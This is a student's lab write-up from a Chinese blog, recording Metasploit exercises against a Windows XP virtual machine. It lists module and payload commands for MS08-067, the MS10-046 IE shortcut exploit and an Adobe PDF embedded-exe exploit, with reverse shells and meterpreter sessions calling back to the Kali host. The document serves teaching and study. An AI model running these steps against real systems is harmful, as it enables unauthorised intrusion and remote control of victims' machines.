• Exp5 MSF基础应用


    MS08_067漏洞渗透攻击(主动攻击)

    这个实验使用winXPenSP3为靶机,并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。
    1.打开终端,输入msfconsole

    2.输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;
    3.使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
    4.设置具体参数:

    set RHOST Windows的IP;```
    
    5.输入```show options```查看所有参数是否设置正确
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113408781-52248154.png)
    
    6.最后发起攻击输入```exploit```
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113446155-285754411.png)
    
    ###MS11050安全漏洞(IE浏览器渗透攻击)
    
    使用```免考xp sp3```为靶机;
    首先得确保两台机子在同一网段内,如果不在就手动修改;
    和上一步一样,首先终端中打开```msfconsole```
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160230349-537278511.png)
    利用指令```search ms10_046```找到可以攻击的模块
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160441668-1345545541.png)
    
    输入命令```use exploit/windows/browser/ms10_046_shortcut_icon_dllloader```
    
    使用 ```set payload windows/meterpreter/reverse_tcp ```设置payload,并使用```show options```查看参数:
    
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162235538-2117473671.png)
    
    
    最后下令发起攻击```exploit```
    
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160742544-1112484225.png)
    
    
    复制```local IP```,在靶机上使用IE浏览器进行访问:
    
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162457707-711307356.png)
    
    此时返回kali
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162613473-2036380092.png)
    
    使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:
    
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162720880-656205196.png)
    
    
    ###对Adobe的漏洞攻击
    输入```search adobe```查询和```adobe```漏洞有关的模块
    将```exploit/windows/fileformat/adobe_pdf_embedded_exe```作为选择,然后```show payloads```查看```payload```:
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425163208741-277551273.png)
    输入命令``` use exploit/windows/fileformat/adobe_pdf_embedded_exe```
    选择``` windows/meterpreter/reverse_tcp``` 作为攻击载荷并输入命令 ```set windows/meterpreter/reverse_tcp```
    接着继续查看参数
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425164747784-389552693.png)
    输入``` set LHOST Kali的IP ```,接着```exploit```进行攻击
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425164949659-1414727268.png)
    会生成一个pdf文件,我们需要找到它并将文件拷贝至windows XP下。
    
    这个pdf文件是在隐藏文件夹中,所以我们需要在文件夹选项中选中查看隐藏文件。
    
    ![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180427135822953-1502406986.png)
    
    输入命令进行监听回连
    ![](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105742916-309070190.png)
    
    ###辅助模块的应用
    输入命令```show auxiliary```查看辅助模块
    在这里我使用```scanner/http/options```
    接着输入命令```use scanner/http/options```之后输入```info```查看信息
    ![](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105232332-1293886875.png)
    设置完参数后执行
    ![](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105322218-1226577013.png)
    ###基础问题回答
    用自己的话解释什么是exploit,payload,encode:
    
    exploit:攻击手段,是能使攻击武器(payload)的方法;
    payload:攻击武器,真正具有攻击性的代码;
    encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;
    ###实验体会
    这个实验让我知道了平时杀毒软件提示有高危漏洞,这些漏洞是如何被别人利用从而达到攻击你电脑的目的的,但是只能通过特定的漏洞攻击特定的电脑,不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是,做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用,最后又莫名能连上了。。。
  • 相关阅读:
    datatable删除一行方法
    jquery绑定事件的坑,重复绑定问题
    jquery表单重置
    koa中上传文件到阿里云oss实现点击在线预览和下载
    koa2使用阿里云oss的nodejs sdk实现上传图片
    input元素默认选中设置
    koa使用koa-passport实现路由进入前登录验证
    jquery获取select多选框选中的值
    jquery方法.serializeArray()获取name和value并转为json数组
    jquery获取表单数据方法$.serializeArray()获取不到disabled的值
  • 原文地址:https://www.cnblogs.com/20145237fhn/p/8927190.html
Copyright © 2020-2023  润新知